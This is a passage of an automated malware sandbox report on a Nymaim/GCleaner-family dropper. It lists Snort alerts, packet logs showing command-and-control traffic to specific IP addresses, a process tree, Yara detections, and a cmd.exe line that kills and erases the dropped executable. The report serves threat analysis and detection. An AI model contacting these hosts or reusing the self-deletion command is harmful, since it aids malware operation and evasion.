                user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                comctl32.dllInitCommonControls
                advapi32.dllAdjustTokenPrivileges

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                107.182.129.235192.168.2.580497062852925 01/05/23-08:47:10.017687TCP2852925ETPRO TROJAN GCleaner Downloader - Payload Response8049706107.182.129.235192.168.2.5
                192.168.2.545.139.105.17149705802041920 01/05/23-08:47:09.800462TCP2041920ET TROJAN GCleaner Downloader Activity M84970580192.168.2.545.139.105.171
                192.168.2.5107.182.129.23549706802852981 01/05/23-08:47:09.990287TCP2852981ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET)4970680192.168.2.5107.182.129.235
                192.168.2.5107.182.129.23549706802852980 01/05/23-08:47:09.925610TCP2852980ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET)4970680192.168.2.5107.182.129.235

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jan 5, 2023 08:56:07.737768888 CET4968480192.168.2.345.139.105.171
                Jan 5, 2023 08:56:07.761897087 CET804968445.139.105.171192.168.2.3
                Jan 5, 2023 08:56:07.762012959 CET4968480192.168.2.345.139.105.171
                Jan 5, 2023 08:56:07.762680054 CET4968480192.168.2.345.139.105.171
                Jan 5, 2023 08:56:07.786715031 CET804968445.139.105.171192.168.2.3
                Jan 5, 2023 08:56:07.796034098 CET804968445.139.105.171192.168.2.3
                Jan 5, 2023 08:56:07.796129942 CET4968480192.168.2.345.139.105.171
                Jan 5, 2023 08:56:07.851315975 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.878505945 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.878683090 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.879445076 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.906332016 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.906673908 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.906842947 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.962685108 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.989851952 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990107059 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990165949 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990190983 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.990214109 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990236044 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.990262032 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.990263939 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990310907 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.990314960 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990365028 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990381956 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.990413904 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990427017 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:07.990462065 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990494013 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990529060 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:07.990629911 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.017534971 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017608881 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017657042 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017700911 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017730951 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.017730951 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.017730951 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.017749071 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017796993 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017797947 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.017797947 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.017848015 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017880917 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.017894983 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017904043 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.017940998 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017947912 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.017985106 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.017991066 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018032074 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018035889 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018078089 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018080950 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018122911 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018126011 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018167973 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018171072 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018214941 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018218040 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018260956 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018268108 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018307924 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018313885 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018353939 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018364906 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018399954 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018410921 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018445015 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.018456936 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.018511057 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045362949 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045439959 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045490026 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045516014 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045542002 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045578957 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045578957 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045592070 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045603037 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045643091 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045655966 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045691967 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045712948 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045737982 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045749903 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045785904 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045799017 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045836926 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045854092 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045883894 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045897961 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045931101 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045943975 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.045978069 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.045985937 CET4968580192.168.2.3107.182.129.235
                Jan 5, 2023 08:56:08.046024084 CET8049685107.182.129.235192.168.2.3
                Jan 5, 2023 08:56:08.046040058 CET4968580192.168.2.3107.182.129.235

                HTTP Request Dependency Graph

                • 45.139.105.171
                • 107.182.129.235
                • 171.22.30.106

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:08:55:57
                Start date:05/01/2023
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\file.exe
                Imagebase:0x400000
                File size:2094367 bytes
                MD5 hash:E0F8085C7CB8EB9CF1C263BB12CFC6DF
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                General

                Target ID:1
                Start time:08:55:58
                Start date:05/01/2023
                Path:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp" /SL4 $203A8 "C:\Users\user\Desktop\file.exe" 1818498 170496
                Imagebase:0x400000
                File size:778752 bytes
                MD5 hash:E8176050192FBB976D70238E3C121F4C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Target ID:2
                Start time:08:56:02
                Start date:05/01/2023
                Path:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Split Files\SplitFiles131.exe"
                Imagebase:0x400000
                File size:3491315 bytes
                MD5 hash:361518D6CC3C25EEC2DFC1DE82B055B2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.338322825.0000000003370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.338187863.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.337441362.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                Reputation:low

                General

                Target ID:3
                Start time:08:56:05
                Start date:05/01/2023
                Path:C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe
                Wow64 process (32bit):true
                Commandline:
                Imagebase:0x1310000
                File size:73728 bytes
                MD5 hash:3FB36CB0B7172E5298D2992D42984D06
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 50%, ReversingLabs
                Reputation:high

                General

                Target ID:12
                Start time:08:56:39
                Start date:05/01/2023
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Imagebase:0xb0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:13
                Start time:08:56:39
                Start date:05/01/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff745070000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:14
                Start time:08:56:39
                Start date:05/01/2023
                Path:C:\Windows\SysWOW64\taskkill.exe
                Wow64 process (32bit):true
                Commandline:taskkill /im "SplitFiles131.exe" /f
                Imagebase:0xff0000
                File size:74752 bytes
                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                No disassembly